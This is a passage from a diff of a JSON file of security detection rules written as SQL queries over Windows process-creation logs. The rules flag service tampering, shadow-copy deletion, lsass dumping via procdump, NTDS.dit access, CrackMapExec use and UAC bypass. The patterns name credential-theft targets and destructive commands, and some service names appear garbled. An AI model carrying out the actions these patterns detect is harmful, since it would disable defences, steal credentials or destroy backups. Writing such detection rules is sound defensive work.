'%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE '%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_reg_susp_paths.yml" + "filename": "proc_creation_win_susp_service_tamper.yml" }, { - "title": "Service StartupType Change Via Sc.EXE", - "id": "85c312b7-f44d-4a51-a024-d671c40b49fc", - "status": "experimental", - "description": "Detect the use of \"sc.exe\" to change the startup type of a service to \"disabled\" or \"demand\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Disabled IE Security Features", + "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", + "status": "test", + "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "False positives may occur with troubleshooting scripts" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '% config %' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND (CommandLine LIKE '%disabled%' ESCAPE '\\' OR CommandLine LIKE '%demand%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_disable_service.yml" + "filename": "proc_creation_win_powershell_disable_ie_features.yml" }, { - "title": "Suspicious Use of PsLogList", - "id": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", + "title": "HackTool - CrackMapExec Execution", + "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "status": "test", + "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" + }, + { + "title": "Suspicious Regsvr32 Execution With Image Extension", + "id": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", "status": "experimental", - "description": "Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of REGSVR32.exe with DLL files masquerading as image files", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ - "Another tool that uses the command line switches of PsLogList", - "Legitimate use of PsLogList by an administrator" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'psloglist.exe' OR (NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\')) AND (CommandLine LIKE '% security%' ESCAPE '\\' OR CommandLine LIKE '% application%' ESCAPE '\\' OR CommandLine LIKE '% system%' ESCAPE '\\') AND (CommandLine LIKE '% -d%' ESCAPE '\\' OR CommandLine LIKE '% /d%' ESCAPE '\\' OR CommandLine LIKE '% -x%' ESCAPE '\\' OR CommandLine LIKE '% /x%' ESCAPE '\\' OR CommandLine LIKE '% -s%' ESCAPE '\\' OR CommandLine LIKE '% /s%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% /c%' ESCAPE '\\' OR CommandLine LIKE '% -g%' ESCAPE '\\' OR CommandLine LIKE '% /g%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND (CommandLine LIKE '%.bmp' ESCAPE '\\' OR CommandLine LIKE '%.cr2' ESCAPE '\\' OR CommandLine LIKE '%.eps' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.ico' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.nef' ESCAPE '\\' OR CommandLine LIKE '%.orf' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.raw' ESCAPE '\\' OR CommandLine LIKE '%.sr2' ESCAPE '\\' OR CommandLine LIKE '%.tif' ESCAPE '\\' OR CommandLine LIKE '%.tiff' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psloglist.yml" + "filename": "proc_creation_win_regsvr32_image.yml" }, { - "title": "Email Exifiltration Via Powershell", - "id": "312d0384-401c-4b8b-abdf-685ffba9a332", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", + "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", "status": "experimental", - "description": "Detects email exfiltration via powershell cmdlets", - "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.exfiltration" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_email_exfil.yml" + "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" }, { - "title": "Imports Registry Key From an ADS", - "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", + "title": "Potential Procdump Evasion", + "id": "79b06761-465f-4f88-9ef2-150e24d3d737", "status": "test", - "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Cases in which procdump just gets copied to a different directory without any renaming" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regedit_import_keys_ads.yml" + "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" }, { - "title": "Bypass UAC via CMSTP", - "id": "e66779cc-383e-4224-a3a4-267eeb585c40", - "status": "test", - "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", + "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", + "status": "experimental", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002", - "attack.t1218.003" + "attack.execution", + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ], "falsepositives": [ - "Legitimate use of cmstp.exe utility by legitimate user" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_cmstp.yml" + "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" }, { - "title": "Renamed NetSupport RAT Execution", - "id": "0afbd410-de03-4078-8491-f132303cb67d", + "title": "Renamed Vmnat.exe Execution", + "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", "status": "experimental", - "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", + "author": "elhoim", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\client32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'vmnat.exe' AND NOT ((NewProcessName LIKE '%vmnat.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_netsupport_rat.yml" + "filename": "proc_creation_win_renamed_vmnat.yml" }, { - "title": "Windows Admin Share Mount Via Net.EXE", - "id": "3abd6094-7027-475f-9630-8ab9be7b9725", - "status": "test", - "description": "Detects when an admin share is mounted using net.exe", - "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", + "title": "Suspicious Add Scheduled Task Parent", + "id": "9494479d-d994-40bf-a8b1-eea890237021", + "status": "experimental", + "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Administrators" + "Software installers that run from temporary folders and also install scheduled tasks" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '% \\\\%\\\\%$%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%unattended.ini%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_net_use_mount_admin_share.yml" + "filename": "proc_creation_win_schtasks_parent.yml" }, { - "title": "Sensitive Registry Access via Volume Shadow Copy", - "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", - "status": "experimental", - "description": "Detects a command that accesses password storing registry hives via volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "Suspicious RazerInstaller Explorer Subprocess", + "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "status": "test", + "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", "tags": [ - "attack.impact", - "attack.t1490" + "attack.privilege_escalation", + "attack.t1553" ], "falsepositives": [ - "Some rare backup scenarios" + "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" + }, + { + "title": "Potential Commandline Obfuscation Using Unicode Characters", + "id": "e0552b19-5a83-4222-b141-b36184bb8d79", + "status": "test", + "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", + "author": "frack113, Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine 